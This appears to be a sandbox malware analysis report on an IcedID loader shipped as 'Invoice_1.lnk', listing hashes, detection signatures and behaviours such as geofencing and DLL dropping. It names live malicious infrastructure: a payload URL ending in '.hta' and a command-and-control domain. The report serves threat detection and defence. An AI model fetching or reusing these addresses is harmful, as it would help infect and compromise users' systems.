General
-
Target
a0fa7f6e03e5d3fa5adfcd5dc1e85354-sample.zip
-
Size
1KB
-
Sample
220525-xy9rdacee9
-
MD5
a3cdbef698dbf2dc5dfc4901ce8b09a5
-
SHA1
b4a3f0d41a5f8baab16d298aecc0c4fcf7eec051
-
SHA256
9646b87a32e3a271b4e36a73a8b9d1742035a0edbcdb11b00f85e3e13178a597
-
SHA512
8c6d0212c30fabc312aafffb7dcc9d9f6a33d8d774020c63fd17174334d433730541faf04d5bfce701e5d8e69d4d68a2aa20ac495f2f4ce3edc3980c0c381876
Static task
static1
Behavioral task
behavioral1
Sample
Invoice_1.lnk
Resource
win7-20220414-en
Malware Config
Extracted
https://conderadio.tv/09872574.hta
Extracted
https://conderadio.tv/09872574.hta
Extracted
icedid
109932505
ilekvoyn.com
Targets
-
-
Target
Invoice_1.lnk
-
Size
2KB
-
MD5
c00c67f3de031c5ae198ba0362b5dd01
-
SHA1
40f3b0263f8fccdf1fd5fe287dbd55829a8eddd6
-
SHA256
d146c8bc52ec74b67704b30c0fb20995ba65770d191502f70c88c262dc44fc5d
-
SHA512
4944aa5947667500eddb4d7fed5b0a8eb4d14db1d60496fcbe38c4032511b04c92757807a23dff49353f5ee75a5ed44cc5de9ed7cdcd12b59a7b8c9214e227ad
-
suricata: ET MALWARE Win32/IcedID Request Cookie
suricata: ET MALWARE Win32/IcedID Request Cookie
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL
-